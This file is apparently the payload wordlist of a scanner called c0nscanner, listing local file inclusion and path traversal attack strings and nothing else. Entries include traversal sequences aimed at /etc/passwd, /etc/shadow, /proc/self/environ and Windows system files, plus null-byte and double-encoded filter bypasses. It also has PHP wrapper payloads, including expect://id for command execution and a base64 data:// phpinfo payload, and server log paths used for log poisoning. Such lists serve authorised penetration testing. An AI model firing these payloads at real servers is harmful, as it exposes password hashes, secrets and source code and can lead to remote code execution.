# lfi/rfi/path traversal payloads - c0nscanner
# unix path traversal
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../etc/shadow
../../../etc/shadow
../etc/hosts
../../../etc/hosts
../proc/self/environ
../../../proc/self/environ
../proc/version
../../../proc/version
../proc/self/cmdline
../../../proc/self/cmdline
# windows path traversal
..\windows\system32\drivers\etc\hosts
..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\system32\drivers\etc\hosts
..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
# null byte injection
../etc/passwd%00
../../../etc/passwd%00
../etc/passwd%00.html
../../../etc/passwd%00.jpg
# double encoding
..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
# php wrappers
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=../config
php://input
php://filter/read=string.rot13/resource=index.php
expect://id
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
# common target files
/etc/passwd
/etc/shadow
/etc/group
/etc/hostname
/proc/self/environ
/proc/self/fd/0
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/auth.log
/var/log/syslog
